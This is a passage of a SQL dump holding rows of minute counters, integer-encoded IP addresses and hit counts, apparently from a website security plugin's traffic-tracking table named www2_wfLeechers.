(24944125, 1123631300, 1),
(24944205, 676177692, 1),
(24944214, 1439300774, 2),
(24944214, 2919005072, 1),
(24944214, 1121751540, 1),
(24944328, 1123631300, 1),
(24944338, 1355389335, 1),
(24944339, 1355389335, 3),
(24944340, 1355389335, 2),
(24944342, 1355389335, 2),
(24944411, 872366351, 1),
(24944588, 1837280593, 2),
(24944643, 2637637378, 4),
(24944737, 1837280593, 2),
(24944750, 1837280593, 1),
(24944815, 1538596638, 1),
(24944815, 1374769563, 1),
(24945037, 3328203529, 1),
(24945067, 676177770, 2),
(24945101, 3024883487, 1),
(24945240, 2745959577, 1),
(24945684, 2644818921, 3),
(24945685, 2644818921, 4),
(24945689, 2644818921, 3),
(24945749, 1338305248, 1),
(24945803, 96753435, 1),
(24945881, 3567663235, 1),
(24945929, 2071806883, 1),
(24945961, 2071806944, 1),
(24945961, 2071807790, 1),
(24945968, 2637637426, 2),
(24946010, 1463941451, 1),
(24946014, 1463941451, 1),
(24946070, 1338305248, 1),
(24946076, 3024883608, 1),
(24946183, 2366148111, 1),
(24946226, 1338305248, 1),
(24946240, 1427778051, 1),
(24946260, 3652617456, 1),
(24946262, 1374769563, 1),
(24946454, 3250485790, 1),
(24946455, 1338305248, 1),
(24946498, 1338305248, 1),
(24946634, 1338305248, 1),
(24946689, 2637637388, 2),
(24946694, 1600967944, 1),
(24946694, 2996488237, 1),
(24946778, 1338305248, 1),
(24946857, 2637637439, 1),
(24947095, 3475901784, 1),
(24947184, 872366395, 1),
(24947252, 2303381350, 1),
(24947290, 872366375, 1),
(24947338, 1123631626, 2),
(24947383, 1123631811, 1),
(24947383, 1123631626, 1),
(24947443, 1439241202, 2),
(24947444, 1439241202, 2),
(24947505, 1538656104, 2),
(24947654, 1123631626, 1),
(24947666, 1374769563, 1),
(24947676, 1123631626, 1),
(24947686, 1123631626, 1),
(24947692, 2637637378, 1),
(24947696, 1123631626, 1),
(24947705, 1123631626, 1),
(24947714, 1123631626, 1),
(24947723, 1123631626, 1),
(24947733, 1123631626, 1),
(24947742, 1123631626, 1),
(24947751, 1123631626, 1),
(24947761, 1123634116, 2),
(24947761, 1247137892, 1),
(24947770, 1123634116, 1),
(24947780, 1123634116, 1),
(24947787, 1123634116, 1),
(24947790, 1123634116, 1),
(24947800, 1123634116, 1),
(24947810, 1123634116, 1),
(24947819, 1123634116, 1),
(24947828, 1439301535, 3),
(24947829, 1439301535, 1),
(24947830, 1123634116, 1),
(24947835, 1570674771, 2),
(24947842, 1123634116, 1),
(24947992, 1338304941, 1),
(24948076, 3373404845, 1),
(24948089, 1123633950, 1),
(24948094, 1837270443, 1),
(24948095, 1837270443, 1),
(24948096, 1837270443, 1),
(24948155, 2731721858, 3),
(24948499, 1123632542, 1),
(24948517, 1600967971, 1),
(24948517, 621375768, 1),
(24948631, 3267064321, 1),
(24948656, 1123632542, 1),
(24948779, 872366346, 1),
(24948780, 96753435, 1),
(24948843, 3495573956, 1),
(24948970, 2637637389, 2),
(24948993, 1570674744, 1),
(24949035, 1123633950, 2),
(24949055, 1123633950, 1),
(24949064, 1374769563, 1),
(24949066, 2509963133, 1),
(24949111, 1123633936, 1),
(24949324, 1796538632, 1),
(24949337, 2077123573, 1),
(24949387, 3024883461, 1),
(24949465, 1123634307, 1),
(24949465, 1123631626, 1),
(24949690, 2637637402, 2),
(24949797, 3475901784, 1),
(24949798, 3475901784, 1),
(24949825, 2760155418, 1),
(24949842, 3154458345, 1),
(24949968, 3649587542, 1),
(24950098, 3427775491, 1),
(24950268, 867140598, 1),
(24950272, 136172254, 1),
(24950402, 786802756, 1),
(24950412, 2637637377, 2),
(24950468, 2760155805, 1),
(24950482, 3645214530, 1),
(24950482, 3645214527, 1),
(24950561, 1374769563, 1),
(24950575, 1374769563, 1),
(24950602, 1837875234, 1),
(24950704, 3492536661, 6),
(24950705, 3492536661, 2),
(24951133, 3475901897, 2),
(24951151, 3475901784, 1),
(24951214, 2509963186, 1),
(24951315, 1538656104, 2),
(24951322, 2366148111, 1),
(24951322, 1570674771, 1),
(24951425, 1600959233, 1),
(24951429, 2503519569, 1),
(24951491, 1538656104, 1),
(24951492, 1538656104, 1),
(24951546, 1123631300, 1),
(24951707, 872366373, 1),
(24951707, 96753435, 1),
(24951792, 758593298, 5),
(24951793, 758593298, 4),
(24951848, 1123631300, 1),
(24951864, 2637637409, 2),
(24952052, 1374769563, 1),
(24952082, 2996488251, 1),
(24952082, 1570674758, 1),
(24952082, 621375750, 1),
(24952097, 1123631300, 1),
(24952128, 1123631300, 1),
(24952155, 3645214533, 2),
(24952155, 3645214526, 1),
(24952194, 1123631300, 1),
(24952290, 1123631300, 1),
(24952428, 1123631300, 1),
(24952585, 786801762, 1),
(24952602, 1123631171, 1),
(24952602, 1123631300, 1),
(24952642, 1123631300, 1),
(24952663, 1123631300, 1),
(24952709, 1123631300, 1),
(24952730, 3652617401, 1),
(24952879, 1123631300, 1),
(24952934, 1123631300, 1),
(24952962, 872366346, 1),
(24952990, 1123631300, 2),
(24953045, 136172254, 1),
(24953058, 1374769563, 1),
(24953065, 2637637395, 1),
(24953131, 1374824265, 3),
(24953166, 1374824265, 1),
(24953172, 1570674744, 1),
(24953288, 2032808987, 2),
(24953309, 3657081847, 1),
(24953390, 1463837825, 3),
(24953395, 1837280593, 2),
(24953436, 2637637594, 1),
(24953439, 1374769563, 1),
(24953580, 2745959577, 1),
(24953586, 1837280593, 2),
(24953599, 3024883608, 1),
(24953599, 3024883483, 1),
(24953601, 3024883590, 1),
(24953623, 1815808080, 2),
(24953630, 3657081847, 1),
(24953785, 3657081847, 1),
(24953786, 2637637428, 1),
(24954015, 1338305640, 1),
(24954039, 3024883606, 1),
(24954058, 1338305640, 1),
(24954059, 583939196, 3),
(24954105, 3512711304, 1),
(24954112, 1338305640, 1),
(24954126, 96317622, 12),
(24954168, 3166510073, 1),
(24954194, 1338305640, 1),
(24954236, 2297635928, 2),
(24954237, 2297635928, 4),
(24954238, 2297635928, 6),
(24954239, 2297635928, 1),
(24954261, 1439283878, 1),
(24954318, 2731721828, 2),
(24954338, 1338305640, 1),
(24954507, 2637637428, 1),
(24954520, 1123631300, 2),
(24954655, 3180686846, 1),
(24954666, 3587417960, 2),
(24954722, 676177710, 1),
(24954729, 1123631300, 1),
(24954780, 1538656104, 2),
(24954783, 1123631300, 1),
(24954784, 1837280593, 2),
(24954802, 676177847, 1),
(24954813, 3587417960, 2),
(24954854, 1837280593, 2),
(24954890, 1538656104, 2),
(24954896, 2509959250, 1),
(24954927, 1374769563, 1),
(24955005, 1837280593, 2),
(24955036, 676177710, 1),
(24955036, 2637637594, 1),
(24955043, 1123631300, 1),
(24955089, 1123631300, 1),
(24955194, 1123631300, 1),
(24955210, 1123631171, 1),
(24955210, 1123631300, 1),
(24955228, 2637637400, 2),
(24955230, 3024883614, 1),
(24955250, 1123631300, 1),
(24955296, 3652617279, 1),
(24955296, 96753435, 1),
(24955393, 1123631300, 1),
(24955438, 2760155429, 1),
(24955613, 1123631300, 1),
(24955699, 1123631300, 1),
(24955848, 3024883481, 1),
(24956031, 1374769563, 1),
(24956042, 2637637379, 2),
(24956072, 3567663235, 1),
(24956106, 676177710, 1),
(24956156, 1123631300, 2),
(24956171, 3342489297, 2),
(24956197, 1123631300, 1),
(24956352, 1374769563, 1),
(24956462, 1837280593, 3),
(24956550, 3024883480, 1),
(24956763, 2637637379, 1),
(24956813, 2954838202, 1),
(24956954, 676177710, 1),
(24956974, 1374769563, 1),
(24957014, 84515914, 5),
(24957483, 1374769563, 1),
(24957556, 2637637379, 2),
(24957651, 676177847, 1),
(24957652, 2996488242, 1),
(24957655, 1538362361, 3),
(24957655, 2919004276, 1),
(24957657, 1538362361, 2),
(24957749, 1538472373, 1),
(24957750, 1538472373, 1),
(24957793, 1399309361, 1),
(24957917, 676177847, 1),
(24958019, 2637637527, 1),
(24958021, 2637637527, 1),
(24958139, 676177847, 1),
(24958292, 3475901888, 1),
(24958337, 3024883599, 1),
(24958488, 1600967956, 1),
(24958490, 1123635081, 2),
(24958501, 1123635081, 1),
(24958512, 1123635081, 1),
(24958539, 3233508538, 1),
(24958723, 1332607321, 1),
(24958739, 1837182367, 1),
(24958740, 2366145606, 1),
(24958778, 3492536660, 2),
(24958875, 1123635081, 1),
(24958910, 1123635081, 1),
(24958916, 1123635081, 1),
(24958923, 676177847, 1),
(24958929, 2071806886, 1),
(24958985, 2071806883, 1),
(24959010, 1834585734, 2),
(24959011, 1834585734, 1),
(24959012, 1834585734, 1),
(24959015, 2637637427, 2),
(24959057, 1123633613, 1),
(24959076, 1374769563, 1),
(24959145, 1123633613, 1),
(24959186, 2680892047, 1),
(24959186, 1374769563, 1),
(24959215, 1123633421, 1),
(24959215, 1123633540, 1),
(24959339, 1538615370, 1),
(24959355, 1123633540, 1),
(24959392, 1123633540, 1),
(24959437, 1123633540, 1),
(24959455, 3024883483, 1),
(24959495, 1815808070, 3),
(24959528, 1123633540, 1),
(24959559, 1123633540, 1),
(24959569, 1123633540, 1),
(24959614, 1123633540, 1),
(24959646, 1123633540, 1),
(24959790, 1844203978, 5),
(24959793, 1123633540, 1),
(24959829, 1123633540, 1),
(24959843, 1123633540, 1),
(24959854, 1123633540, 1),
(24959865, 1123633540, 1),
(24959876, 1123633540, 1),
(24959887, 1123633540, 1),
(24959896, 1123633540, 1),
(24959907, 1123633540, 1),
(24960070, 1370060441, 1),
(24960075, 1073352502, 1),
(24960262, 1123633540, 2),
(24960268, 1123633540, 1),
(24960373, 1123633540, 1),
(24960378, 3475901900, 1),
(24960464, 3587417960, 3),
(24960482, 1374769563, 1),
(24960546, 2637637594, 2),
(24960563, 2637637527, 1),
(24960640, 599388095, 1),
(24960664, 1123631300, 1),
(24960666, 1123631300, 1),
(24960830, 1570674765, 1),
(24960869, 1338306317, 1),
(24960981, 623920375, 1),
(24960988, 623920375, 9),
(24961103, 2637637401, 1),
(24961190, 1338306317, 1),
(24961315, 1374769563, 1),
(24961345, 3657088185, 1),
(24961362, 1092908185, 1),
(24961363, 1050916933, 1),
(24961565, 1463838565, 1),
(24961575, 3657088185, 1),
(24961618, 3657088185, 1),
(24961672, 3657088185, 1),
(24961753, 786801762, 1),
(24961754, 3657088185, 1),
(24961773, 1123631300, 2),
(24961863, 1837280593, 2),
(24961885, 1374769563, 1),
(24961887, 1123631300, 1),
(24961898, 3657088185, 1),
(24961903, 1123631300, 1),
(24961919, 1123631300, 1),
(24961935, 1123631300, 1),
(24961940, 1123631300, 1),
(24961970, 1123631300, 1),
(24962067, 1837280593, 2),
(24962082, 1123631300, 1),
(24962100, 1123631300, 1),
(24962117, 1123631300, 1),
(24962173, 1123631300, 1),
(24962174, 1355389021, 1),
(24962175, 1355389021, 1),
(24962181, 96753435, 1),
(24962321, 3024883468, 1),
(24962321, 3024883490, 1),
(24962322, 3024883473, 1),
(24962330, 1837280593, 2),
(24962354, 1123631300, 1),
(24962394, 1123631300, 1),
(24962600, 3475901899, 1),
(24962653, 1123631300, 1),
(24962689, 1123631300, 1),
(24962733, 2745959577, 1),
(24962849, 1538656104, 2),
(24962864, 1371104126, 1),
(24962866, 1538361201, 1),
(24962867, 1538361201, 3),
(24962869, 1538361201, 6),
(24962970, 872366385, 1),
(24962970, 1405240484, 1),
(24963208, 2509962199, 1),
(24963275, 3475901815, 1),
(24963304, 1123631300, 2),
(24963335, 1837280593, 1),
(24963336, 1837280593, 1),
(24963348, 3475901899, 1),
(24963363, 3492536660, 2),
(24963364, 3492536660, 6),
(24963374, 1538629115, 1),
(24963401, 1463838565, 1),
(24963416, 3475901815, 1),
(24963511, 1538656104, 2),
(24963514, 1838045613, 1),
(24963566, 1123631300, 1),
(24963657, 3475901731, 3),
(24963667, 1123631300, 1),
(24963743, 1123631300, 1),
(24963789, 1123631171, 1),
(24963789, 1123631300, 1),
(24963794, 1123631300, 1),
(24963801, 1399309361, 2),
(24963914, 1123631300, 1),
(24964078, 2637637391, 1),
(24964096, 1123631300, 1),
(24964200, 3024883481, 1),
(24964218, 1123631300, 1),
(24964223, 1123631300, 1),
(24964262, 1123631300, 1),
(24964470, 1109508276, 1),
(24964478, 1109508276, 1),
(24964517, 1123631300, 1),
(24964572, 1123631300, 1),
(24964623, 1463838565, 1),
(24964628, 1123631300, 1),
(24964633, 1123631300, 1),
(24964637, 919627301, 1),
(24964659, 1123633950, 1),
(24964693, 1375116803, 4),
(24964696, 1375116803, 2),
(24964768, 3587417960, 1),
(24964808, 2637637391, 2),
(24964850, 2366148260, 1),
(24964923, 1837280593, 2),
(24965082, 1374769563, 1),
(24965102, 1834526758, 1),
(24965119, 1401300047, 1),
(24965303, 621375758, 1),
(24965377, 3475901815, 1),
(24965400, 1399309361, 2),
(24965589, 2637637391, 1),
(24965645, 1123632542, 2),
(24965662, 1600959772, 1),
(24965662, 2366145549, 1),
(24965670, 1123632542, 1),
(24965701, 1123632419, 1),
(24965701, 1123632542, 1),
(24965710, 3024883604, 1),
(24965813, 1123632542, 1),
(24965825, 1374769563, 1),
(24965825, 632922577, 2),
(24965830, 1834596186, 1),
(24965839, 1834596186, 2),
(24965840, 1834596186, 2),
(24965898, 2366145606, 1),
(24965903, 1399309361, 2),
(24965919, 1466596995, 1),
(24965949, 878139038, 1),
(24965953, 1123632542, 1),
(24966042, 2680913949, 9),
(24966066, 1834584698, 1),
(24966153, 1123633950, 1),
(24966168, 1123633950, 1),
(24966175, 3475901731, 1),
(24966175, 2637637616, 1),
(24966230, 921557824, 2),
(24966275, 96753435, 1),
(24966275, 3652617281, 1),
(24966333, 2637637409, 2),
(24966449, 2509959832, 1),
(24966451, 1399309361, 2),
(24966468, 3475901815, 2),
(24966471, 2637637616, 1),
(24966658, 1123631626, 1),
(24966931, 2637637506, 2),
(24967057, 2637637401, 1),
(24967070, 2637637401, 1),
(24967133, 2783005766, 1),
(24967245, 3024883607, 1),
(24967251, 1600959772, 1),
(24967270, 1374769563, 1),
(24967282, 1137661233, 3),
(24967283, 2928290816, 1),
(24967291, 3512712573, 1),
(24967326, 1123631626, 1),
(24967365, 1161474618, 3),
(24967366, 1161474618, 6),
(24967801, 1570674771, 1),
(24967804, 2637637401, 1),
(24967967, 1837280593, 2),
(24968229, 3024883600, 1),
(24968429, 3657083672, 1),
(24968449, 1837280593, 2),
(24968467, 2996488203, 1),
(24968672, 3281709424, 1),
(24968734, 3024883470, 1),
(24968750, 3657083672, 1),
(24968820, 100556958, 2),
(24968888, 1837920118, 1),
(24968905, 3657083672, 1),
(24968926, 1170573314, 1),
(24968934, 621375751, 1),
(24969109, 2637637428, 1),
(24969115, 2366148185, 1),
(24969132, 1123634244, 2),
(24969135, 3657083672, 1),
(24969150, 1464061315, 1),
(24969151, 1464061315, 1),
(24969178, 3657083672, 1),
(24969189, 2366148131, 1),
(24969232, 3657083672, 1),
(24969271, 782305590, 1),
(24969297, 1538656104, 2),
(24969314, 3657083672, 1),
(24969458, 3657083672, 1),
(24969476, 1123634244, 1),
(24969613, 1123631811, 1),
(24969613, 1123634244, 1),
(24969740, 3024883600, 1),
(24969786, 3492536660, 6),
(24969787, 3492536660, 1),
(24969787, 3492536661, 1),
(24969796, 1123634244, 1),
(24969837, 2637637428, 1),
(24969947, 1538615370, 1),
(24970021, 2366148185, 1),
(24970039, 1834559909, 2),
(24970096, 96753435, 1),
(24970096, 872366385, 1),
(24970113, 3166542325, 2),
(24970122, 1374769563, 1),
(24970247, 3427775492, 1),
(24970255, 1123631626, 1),
(24970261, 1123634244, 1),
(24970276, 1123634244, 1),
(24970506, 1374769563, 1),
(24970555, 3587417960, 1),
(24970570, 1123634238, 1),
(24970571, 1123634238, 1),
(24970709, 2637637428, 1),
(24970722, 1374769563, 1),
(24970835, 2461654898, 1),
(24970843, 1837280593, 2),
(24970874, 1123631300, 1),
(24970917, 3024883475, 1),
(24970930, 786801765, 1),
(24971086, 3106783463, 1),
(24971095, 872366369, 1),
(24971145, 2745959577, 1),
(24971418, 1837280593, 2),
(24971589, 1834609551, 3),
(24971590, 1834609551, 3),
(24971902, 3475901901, 1),
(24971950, 633042990, 18),
(24972148, 2954838202, 1),
(24972194, 520974922, 2),
(24972194, 520974913, 1),
(24972194, 520974918, 1),
(24972194, 1121751542, 1),
(24972203, 1123631300, 1),
(24972211, 1123631300, 1),
(24972220, 1123631300, 1),
(24972228, 758636621, 1),
(24972228, 1123631300, 1),
(24972236, 1123631300, 1),
(24972244, 1123631300, 1),
(24972252, 1123631300, 1),
(24972260, 1123631300, 1),
(24972268, 1123631300, 1),
(24972276, 1123631300, 1),
(24972292, 1123631300, 1),
(24972299, 1123631300, 1),
(24972307, 1123631300, 1),
(24972313, 632837775, 1),
(24972315, 1123631300, 2),
(24972322, 1123631300, 1),
(24972330, 1123631300, 1),
(24972338, 1123631300, 1),
(24972467, 1541139809, 2),
(24972637, 2637637409, 1),
(24972859, 1538512053, 1),
(24972861, 3024883475, 1),
(24972861, 3024883483, 1),
(24972895, 3024883618, 1),
(24972922, 1837280593, 2),
(24972935, 1538656104, 2),
(24972992, 1123631300, 1),
(24973064, 1123631171, 1),
(24973064, 1123631300, 1),
(24973171, 1538615370, 1),
(24973186, 1123631300, 1),
(24973323, 1538629115, 1),
(24973339, 3475901792, 1),
(24973384, 2637637409, 1),
(24973412, 1374769563, 1),
(24973434, 1123631300, 1),
(24973468, 1123631300, 1),
(24973509, 1123631300, 1),
(24973580, 1123631300, 1),
(24973614, 1998329138, 1),
(24973614, 1998329197, 1),
(24973630, 1123631300, 1),
(24973757, 1123631300, 2),
(24973757, 1123633950, 2),
(24973776, 3475901792, 2),
(24973803, 1123631300, 1),
(24973886, 3475901837, 1),
(24973954, 1123631300, 1),
(24974005, 2366148130, 1),
(24974006, 100662534, 1),
(24974065, 1123631300, 1),
(24974112, 96753435, 1),
(24974112, 2760155469, 1),
(24974227, 621375768, 1),
(24974227, 1600967971, 1),
(24974278, 1123631300, 1),
(24974332, 3166540021, 1),
(24974338, 921308649, 1),
(24974357, 919627301, 1),
(24974390, 3024883608, 1),
(24974441, 2989642493, 1),
(24974443, 2989642493, 2),
(24974558, 632900847, 1),
(24974565, 621375751, 1),
(24974568, 1463834777, 1),
(24974742, 3024883469, 1),
(24974772, 2637637409, 1),
(24974787, 3472744982, 4),
(24974867, 2637637433, 2),
(24974882, 1837280593, 1),
(24974996, 1374769563, 1),
(24975111, 1374769563, 1),
(24975155, 1374769563, 1),
(24975158, 3512960595, 1),
(24975370, 3024883487, 1),
(24975494, 3475901898, 1),
(24975722, 3652617392, 1),
(24975761, 1123635081, 2),
(24975830, 1374769563, 1),
(24975842, 3003111232, 2),
(24975871, 3475901792, 1),
(24975883, 1834514215, 1),
(24975908, 3472376328, 1),
(24975974, 1123635081, 1),
(24975976, 3475901792, 1),
(24975989, 3657083499, 1),
(24976003, 1512198042, 1),
(24976107, 1374769563, 1),
(24976131, 1834512911, 1),
(24976204, 1123635081, 1),
(24976265, 1123634948, 1),
(24976265, 1123635081, 1),
(24976268, 2509959733, 1),
(24976291, 919627301, 1),
(24976310, 3657083499, 1),
(24976356, 2637637379, 1),
(24976434, 1837280593, 2),
(24976465, 3657083499, 1),
(24976505, 1374769563, 1),
(24976590, 1538704198, 3),
(24976591, 1538704198, 1),
(24976637, 1374769563, 1),
(24976695, 3657083499, 1),
(24976738, 3657083499, 1),
(24976792, 3657083499, 1),
(24976848, 1358347396, 1),
(24976874, 3657083499, 1),
(24976933, 1358347396, 1),
(24977018, 3657083499, 1),
(24977019, 1358347396, 1),
(24977028, 1358347396, 1),
(24977046, 1358347396, 1),
(24977065, 3475901792, 1),
(24977095, 2637637426, 1),
(24977104, 1358347396, 1),
(24977151, 1358347396, 1),
(24977174, 1358347396, 1),
(24977203, 1358347396, 1),
(24977248, 2513051914, 1),
(24977249, 1358347396, 1),
(24977303, 2513061429, 1),
(24977307, 1123633540, 2),
(24977383, 1123633540, 1),
(24977487, 3475901792, 1),
(24977511, 3157024305, 1),
(24977512, 3157024305, 2),
(24977515, 3157024305, 1),
(24977549, 676177702, 1),
(24977566, 1123633540, 1),
(24977620, 632818382, 1),
(24977681, 772030661, 9),
(24977681, 1374769563, 1),
(24977694, 1123633540, 1),
(24977868, 96753435, 1),
(24977868, 2760155473, 1),
(24977933, 1123631576, 1),
(24977937, 1123633540, 1),
(24977995, 1123633613, 2),
(24978006, 1123633540, 1),
(24978007, 1123633540, 1),
(24978016, 1123633540, 1),
(24978026, 1123633540, 1),
(24978032, 3475901741, 1),
(24978187, 1568199530, 1),
(24978230, 3281709424, 1),
(24980638, 2637637388, 1);
INSERT INTO `www2_wfLeechers` (`eMin`, `IP`, `hits`) VALUES
(24980654, 1055650208, 1),
(24980656, 1055650208, 12),
(24980658, 1055650208, 13),
(24980723, 1538656104, 2),
(24980747, 1439284595, 1),
(24980749, 1439284595, 1),
(24980769, 1123632645, 2),
(24980775, 1439284595, 1),
(24980805, 3024883465, 1),
(24980805, 3024883610, 1),
(24980829, 1837865894, 2),
(24980869, 1374776940, 7),
(24980870, 1374776940, 1),
(24980954, 598126853, 1),
(24981018, 621375768, 1),
(24981018, 1600959772, 1),
(24981083, 1123631171, 1),
(24981083, 1123632645, 1),
(24981145, 1123632645, 1),
(24981256, 3251971736, 2),
(24981277, 1123632645, 2),
(24981281, 3645214531, 1),
(24981281, 3645214526, 1),
(24981281, 3645214530, 1),
(24981309, 3024883595, 1),
(24981348, 1123632645, 1),
(24981357, 2366148260, 1),
(24981387, 2637637399, 1),
(24981655, 1123632645, 1),
(24981682, 1837280593, 2),
(24981710, 1570674771, 1),
(24981711, 1600959247, 1),
(24981720, 2366145549, 1),
(24981745, 621375758, 1),
(24981746, 621375751, 1),
(24981762, 1600967971, 1),
(24981980, 3512961611, 1),
(24982094, 96260904, 7),
(24982116, 1837280593, 2),
(24982166, 1355389035, 1),
(24982168, 1355389035, 3),
(24982169, 1355389035, 2),
(24982337, 1355291200, 1),
(24982338, 1355291200, 2),
(24982343, 1355291200, 1),
(24982364, 1123633950, 1),
(24982379, 96753435, 1),
(24982379, 3652617276, 1),
(24982420, 620875541, 1),
(24982421, 867140598, 1),
(24982697, 3003111232, 1),
(24982977, 1837161381, 1),
(24982993, 1998329142, 1),
(24983147, 1538656104, 2),
(24983196, 1375116379, 1),
(24983223, 3645212881, 1),
(24983234, 3645212875, 1),
(24983261, 1538359134, 1),
(24983262, 1538359134, 2),
(24983263, 1538359134, 1),
(24983418, 3475901892, 1),
(24983549, 1338304785, 1),
(24983585, 1401346405, 1),
(24983687, 520974776, 1),
(24983687, 1837264142, 1),
(24983688, 1837264142, 2),
(24983710, 2509962139, 1),
(24983870, 1338304785, 1),
(24984025, 1338304785, 1),
(24984138, 3475901894, 1),
(24984255, 3657083602, 1),
(24984298, 3657083602, 1),
(24984334, 1600967943, 1),
(24984352, 3657083602, 1),
(24984356, 1049233589, 2),
(24984357, 1049233589, 1),
(24984434, 3657083602, 1),
(24984578, 3657083602, 1),
(24984588, 1123632645, 2),
(24984591, 1463838565, 1),
(24984610, 3250520646, 1),
(24984611, 3250520646, 3),
(24984612, 3250520646, 2),
(24984682, 2679407696, 1),
(24984734, 2783008843, 1),
(24984891, 3475901880, 1),
(24984897, 2637637538, 1),
(24984915, 1055593041, 1),
(24985260, 1123631171, 1),
(24985260, 1123632645, 1),
(24985341, 1123632645, 1),
(24985399, 1123632645, 1),
(24985425, 621375780, 1),
(24985481, 1123632645, 1),
(24985630, 3427775502, 1),
(24985709, 2509959072, 2),
(24985710, 2509959072, 1),
(24985711, 2509959072, 2),
(24985828, 1538655055, 4),
(24985888, 3475901816, 1),
(24985917, 3427775502, 1),
(24985927, 2637637378, 1),
(24986023, 1837384990, 1),
(24986026, 1837384990, 1),
(24986027, 1837384990, 2),
(24986029, 1837384990, 1),
(24986036, 1054012869, 1),
(24986052, 3024883614, 1),
(24986124, 3154492423, 1),
(24986135, 3587417960, 1),
(24986165, 1123632645, 2),
(24986559, 876162633, 2),
(24986614, 3475901747, 1),
(24986660, 2637637391, 1),
(24986674, 3492536661, 6),
(24986675, 3492536661, 2),
(24986731, 3475901816, 1),
(24986740, 3475901747, 2),
(24986776, 1439267802, 1),
(24986777, 1439267802, 1),
(24986782, 676177698, 2),
(24986793, 3652607679, 1),
(24986864, 1123631626, 1),
(24987022, 1123631626, 1),
(24987204, 1123631811, 1),
(24987204, 1123631626, 1),
(24987204, 3475901747, 1),
(24987266, 3475901747, 1),
(24987273, 1837384990, 1),
(24987285, 1837384990, 2),
(24987286, 1837384990, 2),
(24987293, 1837384990, 1),
(24987306, 1123631626, 1),
(24987311, 1374822686, 1),
(24987312, 1374822686, 3),
(24987312, 520974775, 1),
(24987312, 1538774068, 1),
(24987313, 1374822686, 1),
(24987313, 1538774068, 2),
(24987314, 1538774068, 2),
(24987314, 1374822686, 2),
(24987359, 1538774068, 2),
(24987557, 786801762, 1),
(24987587, 2783008843, 1),
(24987618, 3024883609, 1),
(24987704, 1538595673, 1),
(24987755, 96260888, 7),
(24987838, 1401321089, 1),
(24987945, 783509116, 1),
(24987963, 3475901895, 1),
(24988011, 2954838202, 1),
(24988115, 3585737171, 1),
(24988506, 3024883468, 1),
(24988506, 3024883600, 1),
(24988513, 2521214258, 1),
(24988657, 3104369886, 3),
(24988707, 2637637423, 1),
(24988743, 3103966404, 9),
(24988743, 3249721826, 13),
(24988860, 1796538632, 1),
(24989023, 3512959709, 1),
(24989044, 1054012869, 1),
(24989178, 3373404845, 1),
(24989342, 1375071234, 3),
(24989486, 96753435, 1),
(24989486, 872366427, 1),
(24989595, 2637637423, 1),
(24989697, 872366348, 1),
(24989755, 3475901829, 1),
(24989763, 3475901829, 1),
(24990263, 3251245561, 1),
(24990264, 3251245561, 1),
(24990265, 3251245561, 1),
(24990318, 2637637423, 1),
(24990319, 2637637530, 1),
(24990438, 1838091214, 1),
(24990683, 872366382, 1),
(24990804, 3585737171, 1),
(24990856, 1123634307, 1),
(24990856, 1123634231, 2),
(24991002, 1538595673, 1),
(24991071, 2637637409, 1),
(24991079, 1123634231, 1),
(24991109, 3657083370, 1),
(24991149, 3024883461, 1),
(24991181, 1123634231, 1),
(24991237, 1123634231, 1),
(24991263, 1570674694, 1),
(24991430, 3657083370, 1),
(24991472, 2760155439, 1),
(24991536, 2420904848, 2),
(24991541, 1123631626, 1),
(24991567, 1123634231, 1),
(24991585, 3657084039, 1),
(24991602, 1123631626, 1),
(24991660, 2760155457, 1),
(24991699, 1123631626, 1),
(24991795, 1123631626, 1),
(24991796, 2637637409, 1),
(24991815, 3657084039, 1),
(24991836, 1123634231, 1),
(24991858, 3657084039, 1),
(24991901, 1123634231, 1),
(24991912, 3657084039, 1),
(24991974, 676177789, 1),
(24991994, 3657084039, 1),
(24992110, 1463832178, 1),
(24992138, 3657084039, 1),
(24992150, 1570674758, 1),
(24992150, 1570674722, 1),
(24992150, 2996488242, 1),
(24992278, 1463832178, 1),
(24992293, 632920713, 1),
(24992294, 632920713, 1),
(24992572, 2637637538, 1),
(24992588, 3024883477, 1),
(24992731, 1123635081, 1),
(24992745, 3024883489, 1),
(24992870, 1054002081, 1),
(24992978, 1170583858, 2),
(24993161, 783504431, 1),
(24993292, 2637637538, 1),
(24993772, 1463832178, 1),
(24994018, 2637637538, 1),
(24994043, 3488736748, 2),
(24994490, 1760301570, 7),
(24994491, 1760301570, 2),
(24994627, 1463832178, 1),
(24994749, 2637637398, 1),
(24994791, 1463832178, 1),
(24994833, 1584228905, 1),
(24994967, 1463832178, 1),
(24994974, 1463832178, 1),
(24995049, 1463832178, 1),
(24995051, 919627301, 1),
(24995116, 84818769, 1),
(24995117, 84818769, 1),
(24995148, 583808072, 1),
(24995181, 1123632645, 2),
(24995228, 2745959577, 1),
(24995232, 1463832178, 1),
(24995370, 1837280593, 2),
(24995611, 1123631127, 1),
(24995611, 1123632645, 2),
(24995699, 84848372, 2),
(24995743, 2637637397, 1),
(24995780, 1123632645, 1),
(24995786, 1379793056, 2),
(24995786, 3458838893, 1),
(24995861, 1123632645, 1),
(24995925, 1192045327, 3),
(24995952, 3273261687, 1),
(24996069, 2745986569, 3),
(24996070, 2745986569, 6),
(24996115, 1375113052, 1),
(24996180, 1837280593, 2),
(24996263, 3154445620, 1),
(24996300, 1123632645, 1),
(24996315, 1375118415, 2),
(24996315, 1123632645, 1),
(24996316, 1375118415, 1),
(24996317, 1375118415, 2),
(24996318, 1375118415, 1),
(24996319, 1375118415, 1),
(24996388, 2637637530, 1),
(24996410, 1332604279, 1),
(24996442, 1123632645, 1),
(24996463, 3024883606, 1),
(24996644, 1123632645, 2),
(24996673, 1123632645, 1),
(24996698, 1123632645, 1),
(24996698, 1375113052, 1),
(24996702, 3639886582, 1),
(24996715, 1375113052, 2),
(24996743, 3639886582, 1),
(24996750, 1532393936, 4),
(24996753, 1532393936, 2),
(24996754, 1532393936, 2),
(24996755, 2637637429, 1),
(24996757, 1532393936, 3),
(24996758, 1532393936, 2),
(24996759, 1532393936, 2),
(24996762, 1532393936, 3),
(24996763, 1532393936, 2),
(24996766, 1532393936, 1),
(24996802, 2521218217, 1),
(24997033, 786801763, 1),
(24997052, 1608331759, 1),
(24997088, 1123632645, 1),
(24997129, 96753435, 1),
(24997129, 2760155453, 1),
(24997292, 3003111232, 2),
(24997329, 1123632645, 1),
(24997407, 1375113052, 1),
(24997491, 3154508589, 1),
(24997492, 1532393936, 1),
(24997494, 1532393936, 1),
(24997509, 3652617237, 1),
(24997624, 1123631127, 1),
(24997624, 1123632645, 1),
(24997648, 1463955851, 1),
(24997725, 1123632645, 1),
(24997811, 1123632645, 2),
(24997832, 1532393936, 1),
(24998022, 2637637429, 1),
(24998054, 2509962753, 1),
(24998113, 676177742, 1),
